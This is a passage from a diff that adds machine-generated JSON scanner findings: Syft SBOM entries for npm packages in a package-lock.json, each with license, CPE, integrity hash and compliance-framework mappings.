"implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a0800e7f7f0173c9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: any-promise 1.3.0", + "title": "any-promise 1.3.0", + "description": "Package discovered: any-promise 1.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "dc69ebae19192ee6", + "name": "any-promise", + "version": "1.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:any-promise:any-promise:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:any-promise:any_promise:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:any_promise:any-promise:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:any_promise:any_promise:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:any:any-promise:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:any:any_promise:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/any-promise@1.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz", + "integrity": "sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4e58783cc9de2b91", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: anymatch 3.1.3", + "title": "anymatch 3.1.3", + "description": "Package discovered: anymatch 3.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0f1f6d6adbfca65a", + "name": "anymatch", + "version": "3.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jonschlinkert:anymatch:3.1.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/anymatch@3.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", + "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", + "dependencies": { + "normalize-path": "^3.0.0", + "picomatch": "^2.0.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c5e1f2e50730714b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: append-field 1.0.0", + "title": "append-field 1.0.0", + "description": "Package discovered: append-field 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "02ed6bf0c016d0d3", + "name": "append-field", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:append-field:append-field:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:append-field:append_field:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:append_field:append-field:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:append_field:append_field:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:append:append-field:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:append:append_field:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/append-field@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz", + "integrity": "sha512-klpgFSWLW1ZEs8svjfb7g4qWY0YS5imI82dTg+QahUvJ8YqAY0P10Uk8tTyh9ZGuYEZEMaeJYCF5BFuX552hsw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "413f489faf894e63", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: arg 5.0.2", + "title": "arg 5.0.2", + "description": "Package discovered: arg 5.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c190b80836cef557", + "name": "arg", + "version": "5.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:arg:arg:5.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/arg@5.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/arg/-/arg-5.0.2.tgz", + "integrity": "sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0ee2786b2f8f8ad4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: array-flatten 1.1.1", + "title": "array-flatten 1.1.1", + "description": "Package discovered: array-flatten 1.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f61b69e470287928", + "name": "array-flatten", + "version": "1.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:array-flatten:array-flatten:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:array-flatten:array_flatten:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:array_flatten:array-flatten:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:array_flatten:array_flatten:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:array:array-flatten:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:array:array_flatten:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/array-flatten@1.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz", + "integrity": "sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "374f7e7db72708e5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: arrify 2.0.1", + "title": "arrify 2.0.1", + "description": "Package discovered: arrify 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e733388ffa39ebc5", + "name": "arrify", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:arrify:arrify:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/arrify@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/arrify/-/arrify-2.0.1.tgz", + "integrity": "sha512-3duEwti880xqi4eAMN8AyR4a0ByT90zoYdLlevfrvU43vb0YZwZVfxOgxWrLXXXpyugL0hNZc9G6BiB5B3nUug==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e3ccd8258c57c2f8", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: async-retry 1.3.3", + "title": "async-retry 1.3.3", + "description": "Package discovered: async-retry 1.3.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3f1747f861c5fded", + "name": "async-retry", + "version": "1.3.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:async-retry:async-retry:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:async-retry:async_retry:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:async_retry:async-retry:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:async_retry:async_retry:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:async:async-retry:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:async:async_retry:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/async-retry@1.3.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz", + "integrity": "sha512-wfr/jstw9xNi/0teMHrRW7dsz3Lt5ARhYNZ2ewpadnhaIp5mbALhOAP+EAdsC7t4Z6wqsDVv9+W6gm1Dk9mEyw==", + "dependencies": { + "retry": "0.13.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c5b9a7358fc490f2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: asynckit 0.4.0", + "title": "asynckit 0.4.0", + "description": "Package discovered: asynckit 0.4.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3f371bd1625a90e5", + "name": "asynckit", + "version": "0.4.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:asynckit:asynckit:0.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/asynckit@0.4.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b5ad0267f42a44eb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: autoprefixer 10.5.0", + "title": "autoprefixer 10.5.0", + "description": "Package discovered: autoprefixer 10.5.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9d0845c4768cfcf5", + "name": "autoprefixer", + "version": "10.5.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:autoprefixer:autoprefixer:10.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": 